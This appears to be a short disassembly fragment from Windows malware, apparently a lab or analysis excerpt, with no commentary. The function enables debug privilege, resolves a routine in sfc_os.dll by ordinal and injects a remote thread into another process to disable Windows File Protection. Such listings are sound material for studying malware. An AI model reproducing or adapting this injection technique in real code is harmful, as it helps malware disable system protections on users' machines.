00001174 PUSH EBP
00001175 MOV EBP, ESP
00001177 SUB ESP, 12
0000117A MOV DWORD PTR SS:[EBP-4], 0
00001181 MOV DWORD PTR SS:[EBP-8], 0
00001188 MOV DWORD PTR SS:[EBP-12], 0
0000118F PUSH 302C (SeDebugPrivilege)
00001194 CALL 000010FC
00001199 TEST EAX, EAX
0000119B JE SHORT 000011A1
0000119D XOR EAX, EAX
0000119F JMP SHORT 000011F8
000011A1 PUSH 2
000011A3 PUSH 3040 (sfc_os.dll)
000011A8 CALL DWORD PTR DS:[402014] (KERNEL32.dll : LoadLibraryA)
000011AE PUSH EAX
000011AF CALL DWORD PTR DS:[402010] (KERNEL32.dll : GetProcAddress)
000011B5 MOV DWORD PTR DS:[403120], EAX
000011BA MOV EAX, DWORD PTR SS:[EBP+8]
000011BD PUSH EAX
000011BE PUSH 0
000011C0 PUSH 1F0FFF
000011C5 CALL DWORD PTR DS:[402044] (KERNEL32.dll : OpenProcess)
000011CB MOV DWORD PTR SS:[EBP-8], EAX
000011CE CMP DWORD PTR SS:[EBP-8], 0
000011D2 JNZ SHORT 000011D8
000011D4 XOR EAX, EAX
000011D6 JMP SHORT 000011F8
000011D8 PUSH 0
000011DA PUSH 0
000011DC PUSH 0
000011DE MOV ECX, DWORD PTR DS:[403120]
000011E4 PUSH ECX
000011E5 PUSH 0
000011E7 PUSH 0
000011E9 MOV EDX, DWORD PTR SS:[EBP-8]
000011EC PUSH EDX
000011ED CALL DWORD PTR DS:[402028] (KERNEL32.dll : CreateRemoteThread)
000011F3 MOV EAX, 1
000011F8 MOV ESP, EBP
000011FA POP EBP
000011FB RETN 
